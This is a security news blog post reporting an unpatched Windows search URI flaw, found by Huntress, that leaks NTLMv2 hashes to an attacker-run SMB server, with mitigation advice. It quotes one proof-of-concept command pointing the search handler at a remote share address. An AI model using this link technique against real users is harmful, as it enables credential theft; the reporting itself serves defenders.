Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Windows URI Flaw Exposes NTLMv2 Hashes to Attackers

Windows URI Flaw Exposes NTLMv2 Hashes to Attackers

Posted on June 3, 2026 By CWS

A recent discovery has revealed a significant vulnerability in the Windows search URI handler, facilitating the leakage of NTLMv2 hashes to servers controlled by attackers through a simple link interaction. This newly identified issue mirrors a previous bug found in the Snipping Tool, known as CVE-2026-33829, although this variant has not been assigned a CVE or patched by Microsoft.

Understanding the Windows URI Vulnerability

On April 14, 2026, Microsoft addressed CVE-2026-33829, a flaw in the Snipping Tool’s URI handler that led to NTLM credential exposure. This vulnerability allowed attackers to exploit the ms-screensketch: URI handler by directing a filePath parameter to a remote UNC path, resulting in an automatic SMB authentication attempt and the unintentional transmission of a user’s Net-NTLMv2 hash.

Huntress, a cybersecurity firm, discovered that a similar mechanism exists within the Windows search URI handler. By employing crumb=location instead of filePath, attackers can achieve the same NTLMv2 hash leakage to a rogue SMB endpoint. This vulnerability was successfully replicated on Windows 11 25H2 Pro with default settings, underscoring the potential risk to users.

How the Flaw is Exploited

Exploiting this flaw involves tricking a user into clicking a seemingly harmless link, prompting their machine to automatically attempt authentication with an attacker’s SMB server. This process can be initiated from a command prompt using a specific command structure that includes start “” “search:query=test&crumb=location:10.0.1.100share”. The initial click is crucial, as it is the only instance where the NTLMv2 hash is leaked during a single login session.

Moreover, attackers can embed these links in web browsers, such as Microsoft Edge, where loading the URI triggers an SMB authentication attempt without any user prompts. The inherent design of the search and search-ms URI schemes, which share a command line and CLSID mapping, facilitates this vulnerability, necessitating fixes within the SearchExecute or ExplorerFrame.dll components.

Mitigation and Security Recommendations

Despite similarities to the patched Snipping Tool flaw, Microsoft has not yet resolved the search URI vulnerability, citing it as below the servicing threshold. Huntress advises organizations to block outbound SMB (ports TCP 445 and 139) from non-essential hosts as a primary countermeasure. Additional strategies include enforcing SMB signing, limiting or disabling NTLM traffic, and monitoring URI activity in system logs.

These preventive measures can substantially mitigate exposure to this class of NTLM leakage vulnerabilities. As always, staying informed and proactive in applying security best practices is essential in protecting organizational and personal data.

For those interested in further enhancing their cybersecurity knowledge, a free webinar on OWASP API Top 10 and visibility gap solutions with WAAP is available.

Cyber Security News Tags:CVE-2026-33829, Cybersecurity, ExplorerFrame.dll, hash leakage, Huntress, Microsoft flaw, network security, NTLMv2 hash, phishing attack, SearchExecute, SMB authentication, SMB server, SMB signing, URI handler, Windows security

Post navigation

Previous Post: New HTTP/2 Exploit Threatens Major Web Servers
Next Post: Data Breach Affects 525,000 at IMA Diligence Services

Related Posts

RoningLoader Malware Exploits Advanced Evasion Tactics RoningLoader Malware Exploits Advanced Evasion Tactics Cyber Security News
Proxyware Malware Disguised as Notepad++ Tool Leverages Windows Explorer Process to Hijack Systems Proxyware Malware Disguised as Notepad++ Tool Leverages Windows Explorer Process to Hijack Systems Cyber Security News
Researchers Uncovered LockBit’s 5.0 Latest Affiliate Panel and Encryption Variants Researchers Uncovered LockBit’s 5.0 Latest Affiliate Panel and Encryption Variants Cyber Security News
ClipXDaemon: A New C2-Less Threat to Linux Cryptocurrency Users ClipXDaemon: A New C2-Less Threat to Linux Cryptocurrency Users Cyber Security News
Public PoC Exploit for libssh2 RCE Vulnerability Unveiled Public PoC Exploit for libssh2 RCE Vulnerability Unveiled Cyber Security News
Urgent SonicWall Patch Released for Critical Vulnerabilities Urgent SonicWall Patch Released for Critical Vulnerabilities Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Teach Claude Skills Easily with Screen Recording
  • Trump Initiates Defense Supply Chain Security Overhaul
  • Google Unveils Gemini 3.5 Flash Cyber AI for Software Security
  • Top Malware Threats Last Week: A Detailed Overview
  • Zimbra Releases Critical Security Patches for Vulnerabilities

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • July 2026
  • June 2026
  • May 2026
  • April 2026
  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Teach Claude Skills Easily with Screen Recording
  • Trump Initiates Defense Supply Chain Security Overhaul
  • Google Unveils Gemini 3.5 Flash Cyber AI for Software Security
  • Top Malware Threats Last Week: A Detailed Overview
  • Zimbra Releases Critical Security Patches for Vulnerabilities

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark